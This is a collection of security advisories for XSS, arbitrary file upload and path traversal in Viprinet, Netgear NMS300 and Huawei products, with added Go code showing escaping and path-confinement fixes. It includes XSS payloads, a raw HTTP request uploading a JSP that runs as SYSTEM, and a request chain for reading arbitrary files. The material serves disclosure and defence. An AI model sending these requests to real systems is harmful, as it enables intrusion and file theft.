- attempting to log in with a username of '<script>alert(1)</script>' (affects the 'old' interface and results in post-authentication cross-site scripting when a legitimate administrator views the realtime log);
- creating an account with a username of '<script>alert(1)</script>' (affects both the 'old' and 'new' interfaces once created);
- setting the device's hostname to '<script>alert(1)</script>' (affects the 'old' interface once created).

A number of locations were identified as being vulnerable to reflective attacks, including:
http://<host>/exec?module=config&sessionid=<sessionid>&inspect=%3Cscript%20src=http://localhost:9090%3E%3C/script%3E
http://<host>/exec?tool=atcommands&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&commands=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://<host>/exec?tool=ping&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&host=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pingcount=3&databytes=56

The inclusion of session IDs in all URLs partially mitigates the reflective cross-site scripting, but could itself be considered a vulnerability since the session ID is included in Referer headers and log files. These are simply some examples of how this attack might be performed, and it is believed that both the 'old' and 'new' web applications are systemically vulnerable to this.

Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/

Copyright: Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
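Every injection point listed above comes down to the same defect: a user-controlled string is written into a page without being escaped for the context it lands in. The Go program below is an added example, not Viprinet firmware code. It takes the advisory's own payloads, renders the stored username the way a realtime log row might (once spliced in raw, once escaped), and renders the ping tool's reflected host parameter inside a quoted attribute with html/template, whose context-aware escaping neutralises the `">` attribute breakout. The markup fragments and field names are assumptions; the device's real templates are not public.

```go
package main

import (
	"bytes"
	"fmt"
	"html/template"
	"strings"
)

// Payloads from the advisory: a stored username, and a reflected ping-tool
// host value that tries to break out of a quoted attribute.
const (
	username = `<script>alert(1)</script>`
	pingHost = `"><script>alert(1)</script>`
)

// renderLogUnsafe is the vulnerable shape: the username is spliced straight into
// the realtime-log markup, so the script runs when an administrator views the log.
// (The markup is an assumption, not the device's real template.)
func renderLogUnsafe(user string) string {
	return "<tr><td>login failed for " + user + "</td></tr>"
}

// renderLogSafe escapes the value for an HTML text context before emitting it.
func renderLogSafe(user string) string {
	return "<tr><td>login failed for " + template.HTMLEscapeString(user) + "</td></tr>"
}

// pingForm places the reflected host parameter inside a quoted attribute,
// the context the advisory's %22%3E payload targets.
var pingForm = template.Must(template.New("ping").Parse(
	`<input name="host" value="{{.Host}}"> <input name="pingcount" value="{{.Count}}">`))

// renderPingFormSafe renders with html/template, which selects the escaper for
// each context (here an attribute value), so a leading quote cannot close it.
func renderPingFormSafe(host string, count int) (string, error) {
	var buf bytes.Buffer
	err := pingForm.Execute(&buf, map[string]interface{}{"Host": host, "Count": count})
	return buf.String(), err
}

// containsScriptTag is the check a test would apply to rendered output.
func containsScriptTag(markup string) bool {
	return strings.Contains(strings.ToLower(markup), "<script")
}

func main() {
	fmt.Println("unsafe log :", renderLogUnsafe(username))
	fmt.Println("safe log   :", renderLogSafe(username))
	form, err := renderPingFormSafe(pingHost, 3)
	fmt.Println("safe form  :", form, err)
}
```

The escaped log row still shows the administrator exactly what the attacker typed, which is what a log should do; only the browser's interpretation of it changes. Escaping at output time per context is also what makes the "systemically vulnerable" remark above tractable: one templating layer fixes every location at once, rather than chasing the seven listed parameters individually.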
VAR-201602-0193 CVE-2016-1525 Netgear Management System NMS300 Directory Traversal Vulnerability CVSS V2: 7.8
CVSS V3: 8.6
Severity: HIGH
Directory traversal vulnerability in data/config/image.do in NETGEAR Management System NMS300 1.5.0.11 and earlier allows remote authenticated users to read arbitrary files via a .. (dot dot) in the realName parameter. The Netgear Management System NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable.

>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 04/02/2016 / Last updated: 04/02/2016

>> Background on the affected product:
"NMS300 ProSAFE® Network Management System
Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."

>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows systems. It has two serious vulnerabilities that can be exploited by a remote attacker. A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released.

>> Technical details:

#1 Vulnerability: Remote code execution via arbitrary file upload (unauthenticated)
CVE-2016-1524
Affected versions: NMS300 1.5.0.11, NMS300 1.5.0.2, NMS300 1.4.0.17, NMS300 1.1.0.13

There are two servlets that allow unauthenticated file uploads:
@RequestMapping({ "/fileUpload.do" })
public class FileUpload2Controller - uses Spring file upload
@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
public class FileUploadController - uses Flash upload

The JSP file can be uploaded as shown below; it will be named null[name].[extension] and can be reached at http://[host]:8080/null[name].[extension]. So, for example, if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.

POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3

------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"

[name]
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]"
Content-Type: application/octet-stream

<%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello World Example</title>
</head>
<body>
<h2>A Hello World Example of JSP.</h2>
</body>
</html>
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--

#2 Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1525
Affected versions: NMS300 1.5.0.11, NMS300 1.5.0.2, NMS300 1.4.0.17, NMS300 1.1.0.13

Three steps need to be taken in order to exploit this vulnerability:

a) Add a configuration image, with the realName parameter containing the path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1

realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla

b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step a):
POST /data/getPage.do?method=getPageList&type=configImgManager

everyPage=10000

Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}

c) Download the file with the imageId obtained in step b:
GET /data/config/image.do?method=export&imageId=<ID>

>> Fix:
No fix is currently available. It is recommended not to expose NMS300 to the Internet or any untrusted networks.

>> References:
[1] https://www.kb.cert.org/vuls/id/777024

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
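Both NMS300 flaws are input-handling defects: the upload servlets accept any filename and write it where the servlet container will execute it, and the export path joins realName onto a directory without confining the result to that directory. The Go code below is an added example, not Netgear's code, showing the two checks that would have closed them: resolving realName strictly under an image root and rejecting anything that escapes it, and deriving an upload target by stripping directory components and applying an extension allowlist that excludes server-executable types such as .jsp. The directory names /opt/nms300/images and /var/lib/nms300/uploads are assumptions; the traversal string is the one from the advisory, the other inputs are constructed. Paths are handled POSIX-style here; the product runs on Windows, where filepath applies the same logic with backslash separators and drive prefixes.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"path/filepath"
	"strings"
)

// Assumed directories (not Netgear's layout): where configuration images live
// and where uploads are written. Neither should be served by the web container.
const (
	imageRoot = "/opt/nms300/images"
	uploadDir = "/var/lib/nms300/uploads"
)

// The traversal value is the one from the advisory; the benign name is constructed.
const (
	traversalName = "../../../../../../../../../../log.txt"
	benignName    = "fw/FS526Tv2-1337.img"
)

var errEscapesRoot = errors.New("path escapes the image root")

// resolveImagePath joins a user-controlled realName under root and refuses any
// result that does not stay inside it. Checking filepath.Rel after Join (which
// cleans the path) catches "..", absolute paths, and sibling prefixes like root+"2".
func resolveImagePath(root, realName string) (string, error) {
	root = filepath.Clean(root)
	full := filepath.Join(root, filepath.FromSlash(realName))
	rel, err := filepath.Rel(root, full)
	if err != nil {
		return "", err
	}
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errEscapesRoot
	}
	return full, nil
}

// allowedUploadExt is an allowlist. Server-executable types (.jsp among them) are
// absent, so a "nulltesting.jsp" can never be written, let alone run as SYSTEM.
var allowedUploadExt = map[string]bool{".img": true, ".bin": true, ".cfg": true}

// uploadTarget derives the stored filename from the client-supplied one: drop any
// directory part (either separator), require an allowlisted extension, and confine
// the result to dir with the same check used for realName.
func uploadTarget(dir, clientName string) (string, error) {
	base := path.Base(strings.ReplaceAll(clientName, `\`, "/"))
	if base == "." || base == "/" || base == "" {
		return "", errors.New("empty filename")
	}
	ext := strings.ToLower(filepath.Ext(base))
	if !allowedUploadExt[ext] {
		return "", fmt.Errorf("extension %q is not allowed", ext)
	}
	return resolveImagePath(dir, base)
}

func main() {
	for _, n := range []string{traversalName, benignName} {
		p, err := resolveImagePath(imageRoot, n)
		fmt.Printf("realName %q -> %q, %v\n", n, p, err)
	}
	for _, n := range []string{"whatever.jsp", `..\..\evil\firmware.img`} {
		p, err := uploadTarget(uploadDir, n)
		fmt.Printf("upload %q -> %q, %v\n", n, p, err)
	}
}
```

Two points worth noting against the advisory's three-step chain: the export step (c) is only dangerous because step (a) stored an unconfined realName, so the check belongs where the value is stored as well as where it is used; and the upload fix does not rely on authentication, which the servlets lacked anyway, but on the written file never being something the container will execute.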
VAR-201602-0081 CVE-2016-2214 Huawei Agile Controller-Campus Software cross-site scripting vulnerability in unspecified portal authentication page CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in an unspecified portal authentication page in Huawei Agile Controller-Campus with software before V100R001C00SPC319 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. Huawei Agile Controller-Campus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Huawei Agile Controller-Campus is a multi-service converged, open and compatible controller product from Huawei (China). It provides functions such as access control, guest management, and network-wide security assistance.